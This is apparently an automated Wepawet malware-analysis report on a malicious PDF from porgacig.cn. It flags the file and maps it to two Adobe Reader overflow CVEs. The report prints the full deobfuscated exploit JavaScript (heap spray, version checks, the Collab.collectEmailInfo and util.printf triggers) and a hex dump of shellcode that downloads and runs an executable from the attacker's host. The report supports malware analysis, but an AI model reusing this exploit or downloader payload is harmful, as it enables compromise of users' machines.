Wepawet » JavaScript Report for http://porgacig.cn/nuc/spl/pdf.pdf

Analysis report for http://porgacig.cn/nuc/spl/pdf.pdf

Sample Overview

URL	http://porgacig.cn/nuc/spl/pdf.pdf
MD5	a3cdd8f09812f5658cc45012bfe93f21
Analysis Started	2009-02-22 11:34:27
Report Generated	2009-05-17 00:35:53
Jsand version	1.03.02

See the report for domain porgacig.cn.

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
Adobe Collab overflow	Multiple Adobe Reader and Acrobat buffer overflows	CVE-2007-5659
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992

Deobfuscation results

Evals

var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
%uefeb" + "
%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
%ub9e7" + "
%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
%u0a96" + "
%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
%uee85" + "
%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
%ucfaa" + "
%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
%uebaf" + "
%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34
%u10bc" + "
%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6
%uf7ba" + "
%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec
%u0eec" + "
%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97
%ub91c" + "
%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04
%u11d4" + "
%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7
%u1b07" + "
%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u702F%u726F%u6167%u6963%u2E67%u6E63%u6E2F
%u6375%u652F%u6578%u702E%u7068");
var mM6RItmK = new Array();
function yNYJ8yVD(HydurAUR, XbGQrcyY){
  while (HydurAUR.length * 2 < XbGQrcyY){
    HydurAUR += HydurAUR;
  }
  HydurAUR = HydurAUR.substring(0, XbGQrcyY / 2);
  return HydurAUR;
}
function ooyS1YUR(){
  var jKts_E9h = 0x0c0c0c0c;
  var Y9Ib6uuE = 0x400000;
  var xxKaKDUU = i0a7eJNL.length * 2;
  var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU + 0x38);
  var HydurAUR = unescape("%u9090%u9090");
  HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);
  var lYab6ozx = (jKts_E9h - 0x400000) / Y9Ib6uuE;
  for (var gEZCi09R = 0; gEZCi09R < lYab6ozx; gEZCi09R ++ ){
    mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;
  }
}
function RYiFEs8K(){
  var XrCU20If = app.viewerVersion.toString();
  XrCU20If = XrCU20If.replace(/\D/g, '');
  var TPWRJTZJ = new Array(XrCU20If.charAt(0), XrCU20If.charAt(1), XrCU20If.charAt(2));
  if ((TPWRJTZJ[0] != 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) || 
  (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) || (TPWRJTZJ[0] < 7)){
    ooyS1YUR();
    var nabGR_dc = unescape("%u0c0c%u0c0c");
    while (nabGR_dc.length < 44952)nabGR_dc += nabGR_dc;
    this .collabStore = Collab.collectEmailInfo({
      subj : "", msg : nabGR_dc
    }
    );
  }
}
RYiFEs8K();
var nop = "";
for (iCnt = 128; iCnt >= 0 ;-- iCnt)nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + i0a7eJNL;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize + heapblock.lengthwhile (bigblock.length < spray)bigblock += bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 0x40000)block = block + block + fillblock;
mem = new Array();
for (i = 0; i < 1400; i ++ )mem[i] = block + heapblock;
var num = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
util.printf("%45000f", num);

(repeated 1 time)

Writes

No writes.

Network Activity

Requests

URL	Status	Content Type
http://porgacig.cn/nuc/spl/pdf.pdf	200	application/pdf

Redirects

No redirects.

ActiveX controls

AcrobatJavaScript
	Name	Arg0	Arg1	Count
Methods	Collab.collectEmailInfo	''	e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c other 196512 bytes e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c	1
util.printf	%45000f	1.3E295	1

AcrobatJavaScript

Name

Arg0

Arg1

Count

Methods

Collab.collectEmailInfo

''

e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c 
               other 196512 bytes               
e0 b0 8c e0 b0 8c e0 b0  8c e0 b0 8c e0 b0 8c e0 
b0 8c e0 b0 8c e0 b0 8c  e0 b0 8c e0 b0 8c e0 b0 
8c e0 b0 8c e0 b0 8c e0  b0 8c e0 b0 8c e0 b0 8c

util.printf

%45000f

1.3E295

Shellcode and Malware

Hexadecimal	ASCII
43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef 43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9 87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00 21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a 57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66 aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f 07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf 87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07 8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb 97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7 07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10 9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7 07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7 07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e 6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64 92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9 64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0 51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11 b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64 b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b 11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f 2f 70 6f 72 67 61 63 69 67 2e 63 6e 2f 6e 75 63 2f 65 78 65 2e 70 68 70	CCCC..[3.f....3. C...........N... .d..d..Bd..n.... .d...a........f. ...w.e......f... .._.-.....f..... !...;...f....... W.)...f...o.,..f ........f..d.... .d....d......... .x...f..dl/.f.. ......d.....d... .......(.....(.. .......d.....d.. ............4... ....d.....d..... .......d.....d.. .......d.....d.. ................ l....d5......d.d ..d...d..d...... d.....&..B.,.... Q......!........ ....d.d...2.d..d ...2d.d...-.... ..........http:/ /porgacig.cn/nuc /exe.php

Hexadecimal

ASCII

43 43 43 43 eb 0f 5b 33  c9 66 b9 80 01 80 33 ef 
43 e2 fa eb 05 e8 ec ff  ff ff 7f 8b 4e df ef ef 
ef 64 af e3 64 9f f3 42  64 9f e7 6e 03 ef eb ef 
ef 64 03 b9 87 61 a1 e1  03 07 11 ef ef ef 66 aa 
eb b9 87 77 11 65 e1 07  1f ef ef ef 66 aa e7 b9 
87 ca 5f 10 2d 07 0d ef  ef ef 66 aa e3 b9 87 00 
21 0f 8f 07 3b ef ef ef  66 aa ff b9 87 2e 96 0a 
57 07 29 ef ef ef 66 aa  fb af 6f d7 2c 9a 15 66 
aa f7 06 e8 ee ef ef b1  66 9a cb 64 aa eb 85 ee 
b6 64 ba f7 b9 07 64 ef  ef ef bf 87 d9 f5 c0 9f 
07 78 ef ef ef 66 aa f3  64 2a 6c 2f bf 66 aa cf 
87 10 ef ef ef bf 64 aa  fb 85 ed b6 64 ba f7 07 
8e ef ef ef ec aa cf 28  ef b3 91 c1 8a 28 af eb 
97 8a ef ef 10 9a cf 64  aa e3 85 ee b6 64 ba f7 
07 af ef ef ef 85 e8 b7  ec aa cb dc 34 bc bc 10 
9a cf bf bc 64 aa f3 85  ea b6 64 ba f7 07 cc ef 
ef ef 85 ef 10 9a cf 64  aa e7 85 ed b6 64 ba f7 
07 ff ef ef ef 85 10 64  aa ff 85 ee b6 64 ba f7 
07 ef ef ef ef ae b4 bd  ec 0e ec 0e ec 0e ec 0e 
6c 03 eb b5 bc 64 35 0d  18 bd 10 0f ba 64 03 64 
92 e7 64 b2 e3 b9 64 9c  d3 64 9b f1 97 ec 1c b9 
64 99 cf ec 1c dc 26 a6  ae 42 ec 2c b9 dc 19 e0 
51 ff d5 1d 9b e7 2e 21  e2 ec 1d af 04 1e d4 11 
b1 9a 0a b5 64 04 64 b5  cb ec 32 89 64 e3 a4 64 
b5 f3 ec 32 64 eb 64 ec  2a b1 b2 2d e7 ef 07 1b 
11 10 10 ba bd a3 a2 a0  a1 ef 68 74 74 70 3a 2f 
2f 70 6f 72 67 61 63 69  67 2e 63 6e 2f 6e 75 63 
2f 65 78 65 2e 70 68 70

CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/porgacig.cn/nuc
/exe.php

Additional (potential) malware:

URL	Type	Hash	Analysis
http://porgacig.cn/nuc/exe.php	MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit	a2872c88cdbaad0cd938ff05319889e4	Anubis report Virustotal report

Wepawet (alpha)

Analysis report for http://porgacig.cn/nuc/spl/pdf.pdf

Sample Overview

Detection results

Exploits

Deobfuscation results

Evals

Writes

Network Activity

Requests

Redirects

ActiveX controls

Shellcode and Malware